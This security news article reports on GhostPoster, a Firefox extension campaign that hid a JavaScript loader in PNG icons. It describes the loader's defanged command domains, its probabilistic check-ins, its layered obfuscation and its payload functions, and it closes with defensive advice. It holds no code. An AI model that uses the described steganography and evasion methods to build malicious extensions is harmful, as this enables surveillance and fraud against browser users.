editorially independent. We may make money when you click on links
to our partners.
Learn More
Koi researchers have uncovered a large-scale Firefox extension malware campaign that hid malicious code inside something most users never scrutinize: an extension’s logo.
Named GhostPoster, the campaign used steganography to embed executable JavaScript inside PNG icon files, ultimately infecting more than 50,000 Firefox users through trusted add-ons.
The campaign delivers “… a multi-stage malware payload that monitors everything you browse, strips away your browser’s security protections, and opens a backdoor for remote code execution,” said Koi researchers.
GhostPoster Campaign Targets Trusted Extensions
GhostPoster highlights how browser extensions — often implicitly trusted by users and organizations — remain a high-risk attack surface.
The campaign spans at least 17 Firefox extensions, including Free VPN Forever, which alone had more than 16,000 installs and remains available on the Firefox Add-ons marketplace at the time of analysis.
Collectively, the extensions promise benign functionality such as VPN access, translation tools, weather updates, and ad blocking, while silently delivering a persistent, multi-stage malware payload.
How the GhostPoster Infection Chain Works
The GhostPoster infection chain begins with an extension loading its own icon file — standard behavior for any browser add-on.
Instead of simply rendering the image, however, the extension reads the raw bytes of the PNG file and scans for a specific marker sequence (===). Everything after that marker is not image data, but hidden JavaScript embedded directly in the file.
This technique, known as steganography, allows malicious code to evade static scanning and manual review.
Security tools inspecting extension source files see no obvious payload, and the icon displays normally in the browser toolbar. Each time the extension loads, however, the hidden JavaScript is extracted and executed.
The code embedded in the PNG does not contain the final malware.
Instead, it acts as a loader that retrieves additional payloads from attacker-controlled infrastructure.
The loader contacts liveupdt[.]com and, if unavailable, falls back to dealctr[.]com, passing a unique signature so operators can track infected installations.
How GhostPoster Evades Detection
GhostPoster relies on layered evasion techniques to avoid detection. The loader checks in only every 48 hours and downloads the next-stage payload just 10% of the time.
This probabilistic behavior makes network monitoring unreliable, as infected extensions may appear completely inactive during observation.
When payloads are delivered, they are obfuscated using custom encoding — swapping character case, altering numeric values, Base64 decoding, and XOR encryption tied to the extension’s runtime ID.
The decoded payload is stored in browser storage, establishing persistence without writing traditional files to disk.
These techniques ensure the malware exists primarily in memory and runtime state, to hide from forensic analysis.
Inside the GhostPoster Browser Payload
Once active, the GhostPoster payload provides attackers with full control over the victim’s browser environment.
One primary monetization method is affiliate link hijacking, where legitimate affiliate links on major e-commerce platforms are silently replaced with attacker-controlled links, redirecting commissions without disrupting the user’s experience.
The malware also injects tracking code into every page visited, using Google Analytics identifiers to collect browsing behavior, installation timelines, and merchant activity.
Hidden HTML elements are dynamically inserted into pages to store metadata and identifiers tied to the infected browser.
The extension also strips key browser security headers — including Content-Security-Policy and X-Frame-Options — from HTTP responses.
This weakens built-in defenses against cross-site scripting and clickjacking across all sites the user visits.
Additional capabilities include CAPTCHA bypass mechanisms, invisible iframe injection for ad and click fraud, referrer manipulation, and dynamic cleanup to remove visible artifacts after execution.
How to Reduce Browser Extension Risk
The following practices help organizations manage browser extension risk.
- Treat browser extensions as part of the endpoint attack surface and restrict installation using browser policies and approved allowlists.
- Audit installed extensions regularly, with particular scrutiny on “free” services such as VPNs or utilities that request broad permissions.
- Monitor extension behavior for signs of abuse, including unexpected network connections, dynamic code execution, or response manipulation.
- Integrate browser and extension telemetry into EDR or SIEM platforms to improve detection and correlation of suspicious activity.
- Apply network-level controls, such as DNS filtering or secure web gateways, to block known malicious extension infrastructure.
- Educate users to install extensions only from trusted publishers and remove add-ons that are no longer necessary or actively maintained.
Together, these controls help reduce browser-based risk by improving visibility, limiting unnecessary exposure, and strengthening overall endpoint security posture.
Attackers Exploit Trust Signals
GhostPoster reflects a broader trend in which attackers exploit trust signals rather than technical vulnerabilities.
By hiding malware in images and spreading it through legitimate marketplaces, attackers bypass traditional security assumptions and operate entirely within expected browser behavior.
This trend reinforces why many organizations are adopting zero-trust principles that remove implicit trust and continuously verify activity, even when it appears legitimate.
